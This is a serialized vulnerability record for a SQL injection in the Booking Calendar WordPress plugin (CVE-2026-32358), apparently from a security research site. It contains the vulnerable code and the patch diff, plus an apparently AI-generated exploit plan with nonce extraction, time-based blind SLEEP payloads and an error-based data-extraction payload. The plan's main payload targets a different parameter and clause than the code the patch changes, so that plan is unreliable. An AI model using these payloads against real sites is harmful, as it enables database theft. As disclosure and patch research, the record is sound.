[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fDyTGPUwHiWZJCshzOC3yURe-LI8SZthEVkk00CgGlZM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-32358","booking-calendar-authenticated-editor-sql-injection-2","Booking Calendar \u003C= 10.14.15 - Authenticated (Editor+) SQL Injection","The Booking Calendar plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 10.14.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","booking",null,"\u003C=10.14.15","10.14.16","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-02-14 00:00:00","2026-04-15 21:05:06",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fcc90d500-b338-43ff-aac7-14a42d3d16b8?source=api-prod",61,[22,23,24,25,26,27,28,29],"includes\u002F_functions\u002Fadmin_menu_url.php","includes\u002F_toolbar_ui\u002Fui__settings_panel.php","includes\u002Fpage-bookings\u002Fbookings__sql.php","includes\u002Fpage-form-simple\u002Fpage-form-simple.php","includes\u002Fpage-settings-form-options\u002Fpage-settings-form-options.php","includes\u002Fui_settings\u002Fclass-menu-structure.php","readme.txt","wpdev-booking.php","researched",false,3,"This research plan outlines the steps to exploit a SQL injection vulnerability in Booking Calendar \u003C= 10.14.15.\n\n### 1. Vulnerability Summary\nThe Booking Calendar plugin is vulnerable to an **Authenticated (Editor+) SQL Injection** within its booking listing functionality. The vulnerability exists because user-supplied filters for the booking table are insufficiently sanitized and are concatenated directly into SQL queries without using `$wpdb->prepare()`. Specifically, parameters intended to be used in SQL `IN` clauses or complex `WHERE` conditions are improperly handled, allowing an attacker with Editor-level privileges to inject arbitrary SQL commands.\n\n### 2. Attack Vector Analysis\n* **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n* **AJAX Action:** `wpbc_get_bookings_listing`\n* **Vulnerable Parameter:** `wh_booking_type` (and potentially `wh_pay_status` or `wh_approved`)\n* **Authentication:** Requires a user with at least **Editor** privileges (or any user with the `manage_bookings` capability).\n* **Preconditions:** The attacker must be logged in and possess a valid WordPress nonce for the `wpbc_ajx_booking_listing` action.\n\n### 3. Code Flow\n1. **Entry Point:** The attacker sends a POST request to `admin-ajax.php` with the action `wpbc_get_bookings_listing`.\n2. **Parameter Mapping:** The plugin calls `wpbc_ajx_get__request_params__names_default()` (found in `includes\u002Fpage-bookings\u002Fbookings__sql.php`) to extract and \"validate\" parameters from `$_REQUEST`.\n3. **Vulnerable Processing:** The parameter `wh_booking_type` is defined as `digit_or_csd` (digit or comma-separated digits). If the validation is bypassed or if the parameter is used before strict validation, it is passed to the SQL construction logic.\n4. **SQL Construction:** A function (typically `wpbc_get_bookings_sql` or similar, inferred from `bookings__sql.php`) constructs the final query. It builds a `$where` clause by concatenating the filters.\n5. **Sink:** The raw SQL string is executed via `$wpdb->get_results()` without being passed through `$wpdb->prepare()`.\n\n### 4. Nonce Acquisition Strategy\nThe AJAX action `wpbc_get_bookings_listing` requires a nonce. This nonce is localized when an authorized user visits the Bookings page.\n\n1. **Identify Page:** The Bookings listing is located at `wp-admin\u002Fadmin.php?page=wpbc`.\n2. **Navigation:** Log in as an Editor and navigate to this URL.\n3. **Extraction:** The plugin uses `wp_localize_script` to pass the nonce to the frontend. The data is stored in the global JavaScript object `wpbc_ajx_booking_listing`.\n4. **Execution Agent Command:**\n ```javascript\n \u002F\u002F Use browser_eval to extract the nonce\n const nonce = browser_eval(\"window.wpbc_ajx_booking_listing?.nonce\");\n ```\n\n### 5. Exploitation Strategy\nWe will use a time-based blind SQL injection payload to confirm the vulnerability.\n\n* **Step 1: Login**\n Log in as a user with the **Editor** role.\n* **Step 2: Nonce Extraction**\n Navigate to `wp-admin\u002Fadmin.php?page=wpbc` and extract `wpbc_ajx_booking_listing.nonce`.\n* **Step 3: Trigger Injection**\n Send a POST request to `admin-ajax.php`.\n\n**Request Details:**\n* **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Method:** POST\n* **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n* **Body Parameters:**\n * `action`: `wpbc_get_bookings_listing`\n * `_wpnonce`: `[EXTRACTED_NONCE]`\n * `wh_booking_type`: `1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n * `wh_trash`: `any`\n\n**Payload Analysis:**\nThe payload `1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -` is designed to break out of an `IN ( ... )` clause. If the original query is `SELECT ... WHERE resource_id IN (1)`, the injected query becomes `SELECT ... WHERE resource_id IN (1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -)`.\n\n### 6. Test Data Setup\n1. **User Creation:**\n ```bash\n wp user create attacker_editor editor@example.com --role=editor --user_pass=password123\n ```\n2. **Plugin Activation:** Ensure the Booking Calendar plugin is active.\n3. **Booking Data (Optional):** Creating a single booking ensures the query returns results, though blind injection should work regardless if the condition is appended to the `WHERE` clause.\n\n### 7. Expected Results\n* The HTTP request should take **at least 5 seconds** to complete.\n* The response will likely be a JSON object starting with `{\"success\":true...}` if the syntax is valid, or `0` if the action fails, but the **timing** is the primary indicator of success.\n\n### 8. Verification Steps\nAfter performing the exploit, verify the vulnerability by checking the response time difference between a true and false condition:\n1. **True condition (Delay):** `wh_booking_type=1) AND 1=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n2. **False condition (No Delay):** `wh_booking_type=1) AND 1=2 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n\n### 9. Alternative Approaches\nIf `wh_booking_type` is strictly validated, try the following parameters defined in `includes\u002Fpage-bookings\u002Fbookings__sql.php`:\n* **`wh_pay_status[]`**: This is defined as an `array`. Sending a string or a crafted array element may bypass validation:\n `wh_pay_status[]=all') AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n* **`wh_approved`**: Similar to `wh_booking_type`, it uses `digit_or_csd` validation.\n* **`wh_booking_date[]`**: Also an array parameter.\n\nIf the environment has `WP_DEBUG` enabled, switch to an **error-based** payload to extract the database version:\n* `wh_booking_type=1) AND updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)-- -`","The Booking Calendar plugin for WordPress is vulnerable to SQL injection through the booking listing functionality. Authenticated attackers with Editor privileges or higher can inject arbitrary SQL commands into database queries because user-supplied filters are concatenated directly into SQL strings without being processed by $wpdb->prepare() or receiving sufficient sanitization.","\u002F\u002F includes\u002Fpage-bookings\u002Fbookings__sql.php lines 1043-1049\n\n} else if ($wh_booking_date === '4') { \u002F\u002F Next\n $sql_where = $and_pre.\"( \".$pref.\"booking_date \u003C= (\" . wpbc_sql_date_math_expr_explicit( \"+ INTERVAL \". $wh_booking_date2 . \" DAY\", 'curdate' ) . \") ) \".$and_suf ;\n \u002F\u002F $sql_where .= $and_pre.\"( \".$pref.\"booking_date >= (\" . wpbc_sql_date_math_expr_explicit( \"- INTERVAL 1 DAY\", 'curdate' ) . \") ) \".$and_suf ;\n $sql_where .= $and_pre.\"( \".$pref.\"booking_date > ( \" . wpbc_sql_date_math_expr_explicit('', 'curdate') . \" ) ) \".$and_suf ; \u002F\u002F FixIn: 8.0.1.1.\n\n} else if ($wh_booking_date === '5') { \u002F\u002F Prior\n $wh_booking_date2 = str_replace('-', '', $wh_booking_date2);\n $sql_where = $and_pre.\"( \".$pref.\"booking_date >= (\" . wpbc_sql_date_math_expr_explicit( \"- INTERVAL \". $wh_booking_date2 . \" DAY\", 'curdate' ) . \") ) \".$and_suf ;\n\n---\n\n\u002F\u002F includes\u002Fpage-bookings\u002Fbookings__sql.php lines 1125-1128\n\n} else if ($wh_modification_date === '5') { \u002F\u002F Prior\n $wh_modification_date2 = str_replace('-', '', $wh_modification_date2);\n $sql_where = $and_pre.\"( \".$pref.\"modification_date >= (\" . wpbc_sql_date_math_expr_explicit( \"- INTERVAL \". $wh_modification_date2 . \" DAY\", 'curdate' ) . \") ) \".$and_suf ;","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbooking\u002F10.14.15\u002Fincludes\u002Fpage-bookings\u002Fbookings__sql.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbooking\u002F10.14.16\u002Fincludes\u002Fpage-bookings\u002Fbookings__sql.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbooking\u002F10.14.15\u002Fincludes\u002Fpage-bookings\u002Fbookings__sql.php\t2026-02-09 08:54:00.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbooking\u002F10.14.16\u002Fincludes\u002Fpage-bookings\u002Fbookings__sql.php\t2026-02-10 08:19:20.000000000 +0000\n@@ -1043,12 +1043,14 @@\n \t\t\t $sql_where = '';\n \n \t\t\t } else if ($wh_booking_date === '4') { \u002F\u002F Next\n+\t\t\t\t\t$wh_booking_date2 = intval( $wh_booking_date2 ); \u002F\u002F FixIn: 10.14.16.1.\n \t\t\t $sql_where = $and_pre.\"( \".$pref.\"booking_date \u003C= (\" . wpbc_sql_date_math_expr_explicit( \"+ INTERVAL \". $wh_booking_date2 . \" DAY\", 'curdate' ) . \") ) \".$and_suf ;\n \t\t\t \u002F\u002F $sql_where .= $and_pre.\"( \".$pref.\"booking_date >= (\" . wpbc_sql_date_math_expr_explicit( \"- INTERVAL 1 DAY\", 'curdate' ) . \") ) \".$and_suf ;\n \t\t\t\t $sql_where .= $and_pre.\"( \".$pref.\"booking_date > ( \" . wpbc_sql_date_math_expr_explicit('', 'curdate') . \" ) ) \".$and_suf ; \u002F\u002F FixIn: 8.0.1.1.\n \n \t\t\t } else if ($wh_booking_date === '5') { \u002F\u002F Prior\n \t\t\t $wh_booking_date2 = str_replace('-', '', $wh_booking_date2);\n+\t\t\t\t\t$wh_booking_date2 = intval( $wh_booking_date2 ); \u002F\u002F FixIn: 10.14.16.1.\n \t\t\t $sql_where = $and_pre.\"( \".$pref.\"booking_date >= (\" . wpbc_sql_date_math_expr_explicit( \"- INTERVAL \". $wh_booking_date2 . \" DAY\", 'curdate' ) . \") ) \".$and_suf ;\n \t\t\t $sql_where .= $and_pre.\"( \".$pref.\"booking_date \u003C= (\" . wpbc_sql_date_math_expr_explicit( \"+ INTERVAL 1 DAY\", 'curdate' ) . \") ) \".$and_suf ;\n \n@@ -1125,6 +1127,7 @@\n \n \t\t\t } else if ($wh_modification_date === '5') { \u002F\u002F Prior\n \t\t\t $wh_modification_date2 = str_replace('-', '', $wh_modification_date2);\n+\t\t\t\t\t$wh_modification_date2 = intval( $wh_modification_date2 ); \u002F\u002F FixIn: 10.14.16.1.\n \t\t\t $sql_where = $and_pre.\"( \".$pref.\"modification_date >= (\" . wpbc_sql_date_math_expr_explicit( \"- INTERVAL \". $wh_modification_date2 . \" DAY\", 'curdate' ) . \") ) \".$and_suf ;\n \t\t\t $sql_where .= $and_pre.\"( \".$pref.\"modification_date \u003C= (\" . wpbc_sql_date_math_expr_explicit( \"+ INTERVAL 1 DAY\", 'curdate' ) . \") ) \".$and_suf ;","To exploit this vulnerability, an attacker must have Editor-level access. First, the attacker logs in and navigates to the Bookings page (wp-admin\u002Fadmin.php?page=wpbc) to retrieve the required CSRF nonce from the `wpbc_ajx_booking_listing.nonce` JavaScript object. The attacker then sends a POST request to `wp-admin\u002Fadmin-ajax.php` with the action `wpbc_get_bookings_listing`. By manipulating parameters such as `wh_booking_date` and `ui_wh_booking_date_next` (which populates the internal `$wh_booking_date2`), the attacker can inject SQL commands into the `INTERVAL` clause. For example, a time-based blind payload like `1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -` will cause the database to delay execution, confirming the injection.","gemini-3-flash-preview","2026-04-20 22:44:47","2026-04-20 22:45:31",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","10.14.15","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbooking\u002Ftags\u002F10.14.15","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbooking.10.14.15.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbooking\u002Ftags\u002F10.14.16","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbooking.10.14.16.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbooking\u002Ftags"]